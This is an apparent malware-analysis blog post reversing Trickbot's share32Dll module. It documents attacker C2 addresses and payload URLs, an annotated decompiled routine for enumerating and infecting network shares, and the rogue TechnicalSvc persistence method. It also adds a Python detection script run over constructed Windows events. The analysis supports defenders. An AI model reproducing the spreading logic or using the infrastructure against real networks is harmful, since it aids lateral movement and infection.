Goal: Reverse the latest Trickbot module, called “share32Dll”, used to spread the malware over network shares. It is meant to operate in tandem with the worm32Dll module.
Source:
- share32Dll (encoded) (6392917a209ad5879f27d38f1fef295d9f5c3c42)
- share32Dll (decoded) (85cbf2118fa61b25b8e22f5ea9fa270f4d1643ee)
- Trickbot loader (4457952ab8bcc1f0ede8f49d013d059db5262dee)
- share32Dll (URL) hxxp://duhasti8[.]beget[.]tech/toler[.]png
- worm32Dll (URL) hxxp://duhasti8[.]beget[.]tech/worming[.]png
Background
While analyzing one of the latest Trickbot email spam campaigns (group tags “mac1/tot1/tt0002”, subject: “Copy of Invoice – {rand}”; thanks to @dvk01uk), a newly deployed “share32Dll” module was identified.
The decoded module contains four usual Trickbot exported functions:
Start
Control
FreeBuffer
Release
The observed Trickbot main config module was as follows (version 1000053):
<mcconf>
<ver>1000053</ver>
<gtag>tt0002</gtag>
<servs>
<srv>91.83.88[.]51:449</srv>
<srv>188.137.122[.]105:449</srv>
<srv>188.137.122[.]5:449</srv>
<srv>187.248.44[.]85:449</srv>
<srv>187.248.44[.]84:449</srv>
<srv>194.87.99[.]117:443</srv>
<srv>195.133.145[.]222:443</srv>
<srv>185.99.2[.]78:443</srv>
<srv>88.150.197[.]173:443</srv>
<srv>195.133.144[.]27:443</srv>
<srv>194.87.99[.]225:443</srv>
<srv>185.99.2[.]79:443</srv>
<srv>62.141.34[.]242:443</srv>
<srv>194.87.93[.]97:443</srv>
<srv>5.133.179[.]236:443</srv>
<srv>185.212.128[.]91:443</srv>
<srv>91.211.246[.]131:443</srv>
<srv>185.99.2[.]100:443</srv>
<srv>95.46.45[.]164:443</srv>
<srv>185.212.128[.]90:443</srv>
<srv>107.167.24[.]135:443</srv>
<srv>194.87.92[.]223:443</srv>
<srv>194.87.238[.]225:443</srv>
<srv>178.156.202[.]74:443</srv>
<srv>178.156.202[.]117:443</srv>
<srv>93.171.216[.]33:443</srv>
<srv>93.171.217[.]7:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo" />
<module name="injectDll" />
</autorun>
</mcconf>
Summary
share32Dll, compiled with “GCC: (Rev1, Built by MSYS2 project) 6.3.0”, lets Trickbot operators spread across network shares and establishes persistence by registering a service through common Windows API calls. This module appears intended for use in tandem with the worm32Dll module, spreading Trickbot across local networks and shares via the ETERNALBLUE SMB exploit and LDAP queries.
The observed methods in the share32Dll module are as follows:
I. Download a copy of the Trickbot loader from the payload URL
“hxxp://duhasti8[.]beget[.]tech/toler[.]png” and save it locally as “setup.exe”, using WINHTTP.dll API calls inside a function the Trickbot operators themselves named “WormShare”.
The following API calls are used:
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WinHttpCloseHandle
II. Enumerate network resources using Mpr.dll API calls, in combination with GetComputerNameW (used to skip the local host), to find remote hosts whose shares can be reached. The following API calls are used:
WNetOpenEnumW*
WNetEnumResourceW
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
*WNetOpenEnumW is called with DWORD dwScope = 2 (RESOURCE_GLOBALNET), which puts all resources on the network in scope rather than only the connections the machine already has. The decompiled enumeration routine, with the constants and NETRESOURCEW field offsets annotated, is as follows:
v16 = WNetOpenEnumW(2u, 0, 0, a1, &hEnum);     // dwScope 2 = RESOURCE_GLOBALNET, dwType 0 = RESOURCETYPE_ANY
if ( !v16 )
{
  v1 = GetProcessHeap();
  Dst = HeapAlloc(v1, 8u, dwBytes);            // 8 = HEAP_ZERO_MEMORY; Dst receives an array of NETRESOURCEW
  if ( Dst )
  {
    do
    {
      memset(Dst, 0, dwBytes);
      v15 = WNetEnumResourceW(hEnum, &cCount, Dst, &dwBytes);
      if ( v15 )
      {
        if ( v15 != 259 )                      // 259 = ERROR_NO_MORE_ITEMS
          break;
      }
      else
      {
        while ( v23 < cCount )                 // one NETRESOURCEW (8 DWORDs on x86) per entry
        {
          if ( *((_DWORD *)Dst + 8 * v23 + 2) == 2 )   // +2 = dwDisplayType; 2 = RESOURCEDISPLAYTYPE_SERVER
          {
            nSize = 15;
            Str1 = 92;                         // L'\\'
            v7 = 92;                           // L'\\'  -> Str1 becomes "\\\\<computername>"
            if ( GetComputerNameW((LPWSTR)&v8, &nSize) == 0 )
              goto LABEL_15;
            if ( wcscmp(&Str1, *((const wchar_t **)Dst + 8 * v23 + 5)) != 0 )   // +5 = lpRemoteName; skip the local host
            {
              memset(&NetResource, 0, 0x20u);  // sizeof(NETRESOURCEW) on x86
              wsprintfW(&v5, "%", *((_DWORD *)Dst + 8 * v23 + 5));   // format string as rendered by the decompiler
              NetResource.lpRemoteName = &v5;
              v16 = WNetAddConnection2W(&NetResource, 0, 0, 0);      // NULL password/username: current user's token
              if ( !v16 )
              {
                service_create(*((LPCWSTR *)Dst + 8 * v23 + 5));   // drop techsvc.exe and register TechnicalSvc on the remote host (step III)
                WNetCancelConnection2W(NetResource.lpRemoteName, 0, 0);
              }
            }
          }
          if ( *((_DWORD *)Dst + 8 * v23 + 3) & 2 )   // +3 = dwUsage; 2 = RESOURCEUSAGE_CONTAINER (domain/workgroup node)
            service_create1((LPNETRESOURCEW)Dst + v23); // presumably re-enters the enumeration for the container
          ++v23;
        }
      }
    }
    while ( v15 != 259 );
  }
}
LABEL_15:
if ( hEnum )
  WNetCloseEnum(hEnum);
III. Copies itself to the previously mapped ADMIN$ and C$ shares as “techsvc[.]exe” and registers a rogue service named “TechnicalSvc” using the OpenSCManagerW, CreateServiceW and StartServiceW API calls. The dropped binary lands in one of the following locations:
- %SystemDrive%\techsvc[.]exe (via C$)
- %SystemRoot%\system32\techsvc[.]exe (via ADMIN$)
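The three steps above give a detection chain: a write of techsvc.exe into ADMIN$ or C$ over SMB, followed shortly on the same host by the installation of a service named TechnicalSvc (or any service whose binary is techsvc.exe). The following Python is an added example, not code from the original post: it runs that logic over constructed Windows events. Event IDs 5145 (Security, detailed file share access) and 7045 (System, new service installed) are real; the dict layout, the host names, the IP addresses and the timestamps are assumptions made for the example.

```python
"""Hunt for the share32Dll deployment chain in Windows event data (added example).

The events below are constructed. Field names follow the EventData names of
Security event 5145 and System event 7045; the dict shape is an assumption
about how a log pipeline would hand them over, not something the module emits.
"""
from datetime import datetime, timedelta

ROGUE_SERVICE = "technicalsvc"          # service name registered by the module
ROGUE_BINARY = "techsvc.exe"            # dropped file name
TARGET_SHARES = {"ADMIN$", "C$"}        # %SystemRoot% and %SystemDrive% over SMB
WRITE_BITS = 0x2 | 0x4                  # WriteData | AppendData in the 5145 AccessMask

# Constructed sample events: a real hit on WS02, benign noise on WS03/WS04,
# and a service install on WS05 with only a *read* of techsvc.exe before it.
SAMPLE_EVENTS = [
    {"time": "2017-09-10T12:00:01", "host": "WS02", "id": 5145, "IpAddress": "10.0.0.15",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "techsvc.exe", "AccessMask": "0x2"},
    {"time": "2017-09-10T12:00:03", "host": "WS02", "id": 7045, "ServiceName": "TechnicalSvc",
     "ImagePath": "%SystemRoot%\\system32\\techsvc.exe", "StartType": "auto start"},
    {"time": "2017-09-10T12:05:00", "host": "WS03", "id": 7045, "ServiceName": "Sysmon",
     "ImagePath": "C:\\Windows\\Sysmon.exe", "StartType": "auto start"},
    {"time": "2017-09-10T12:06:00", "host": "WS04", "id": 5145, "IpAddress": "10.0.0.15",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "Users\\bob\\report.docx", "AccessMask": "0x2"},
    {"time": "2017-09-10T12:29:00", "host": "WS05", "id": 5145, "IpAddress": "10.0.0.15",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "techsvc.exe", "AccessMask": "0x1"},
    {"time": "2017-09-10T12:30:00", "host": "WS05", "id": 7045, "ServiceName": "TechnicalSvc",
     "ImagePath": "C:\\techsvc.exe", "StartType": "auto start"},
]


def _leaf(path):
    """Last component of a Windows path, with surrounding quotes stripped."""
    return path.strip('"').rstrip("\\").rsplit("\\", 1)[-1]


def is_payload_share_write(ev):
    """5145: a write to ADMIN$ or C$ whose target file is techsvc.exe."""
    if ev["id"] != 5145:
        return False
    share = _leaf(ev["ShareName"]).upper()
    target = _leaf(ev["RelativeTargetName"]).lower()
    mask = int(ev["AccessMask"], 16)
    return share in TARGET_SHARES and target == ROGUE_BINARY and bool(mask & WRITE_BITS)


def is_rogue_service_install(ev):
    """7045: service named TechnicalSvc, or any service whose binary is techsvc.exe."""
    if ev["id"] != 7045:
        return False
    return (ev["ServiceName"].lower() == ROGUE_SERVICE
            or _leaf(ev["ImagePath"]).lower() == ROGUE_BINARY)


def correlate(events, window=timedelta(minutes=5)):
    """One alert per rogue service install. Confidence is 'high' when a payload
    write from a remote peer preceded it on the same host within `window`,
    otherwise 'medium' (the service alone is still worth a look)."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []
    for ev in events:
        if not is_rogue_service_install(ev):
            continue
        t = datetime.fromisoformat(ev["time"])
        sources = sorted({
            w["IpAddress"] for w in events
            if w["host"] == ev["host"] and is_payload_share_write(w)
            and t - window <= datetime.fromisoformat(w["time"]) <= t
        })
        alerts.append({
            "host": ev["host"],
            "service": ev["ServiceName"],
            "image": ev["ImagePath"],
            "sources": sources,
            "confidence": "high" if sources else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print("%(confidence)s\t%(host)s\t%(service)s\t%(image)s\tfrom %(sources)s" % a)
```

The share-write check deliberately requires a write bit in the AccessMask: a 5145 read of techsvc.exe is what a scanner or backup job produces, not what this module produces, so WS05 only gets the medium-confidence alert from its service install. Note that 5145 is only logged when "Audit Detailed File Share" is enabled, so on a default policy the 7045 branch is the one you can rely on.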
Template module configuration in XML format is as follows:
<moduleconfig>
<autostart>yes</autostart>
<needinfo name="id"/>
<needinfo name="ip"/>
</moduleconfig>
Article Link: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html